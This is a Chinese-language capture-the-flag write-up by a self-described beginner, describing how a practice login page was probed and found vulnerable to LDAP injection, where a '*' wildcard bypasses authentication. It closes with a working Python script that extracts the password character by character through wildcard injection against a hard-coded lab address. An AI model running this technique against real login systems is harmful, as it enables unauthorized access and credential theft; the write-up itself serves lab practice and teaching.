前言

渗透小白第一次投稿，希望各位大佬多多包涵。这是一个简单的靶场渗透测试。

渗透过程

访问网址发现是一个登录界面和一段文字：

这句话应该是给我们提示登录的账号，使用Reese账号尝试万能密码绕过，失败：

但是发现页面回显message内容，怀疑存在XSS漏洞：

应该是存在XSS漏洞的，恶意代码已经插入网页，但不知道为啥没有弹窗，因为是self-XSS利用价值不大所以没有去深究。

猜想登录存在SQL注入，尝试使用“'”，“"”，”and 1=1“，”and 1=2“等去触发SQL语句的报错或绕过登录均失败。

扫描网站目录发现只存在当前目录：

查看网页源代码看有不有什么有用的东西，发现存在一个存放CSS脚本的目录，尝试访问，竟然进了后台：

尝试使用搜索功能，提示没有权限，白高兴一场，看来还是需要绕过登录限制：

想了一下，系统给出用户名的提示，应该是想让我们去爆破密码，于是用了密码字典和fuzz字典测试，发现用*可以绕过登录：

成功绕过登录进入后台，发现只有一个搜索框，发现是使用JSON格式发送的数据查询，尝试JSON注入，失败：

于是在网上搜索关于*绕过相关，发现是LDAP注入，*可以直接匹配数据，猜测flag应该是登录密码，尝试使用H*登录，成功，那么flag应该就是登录密码，于是我自己写了个脚本成功拿到flag，脚本如下：

import requests
import string
flag = ''
wl = ''
wordlist = string.ascii_lowercase + string.ascii_uppercase + '0123456789_}'
while 1:
for i in wordlist:
wl = flag+i
url = 'http://178.128.37.153:32155/login'
value = {'username':'Reese','password':wl+'*'}
response = requests.post(url,value)
if response.headers['Content-Length'] == '2586':
flag = wl
print(flag)
break
if i=='}':
break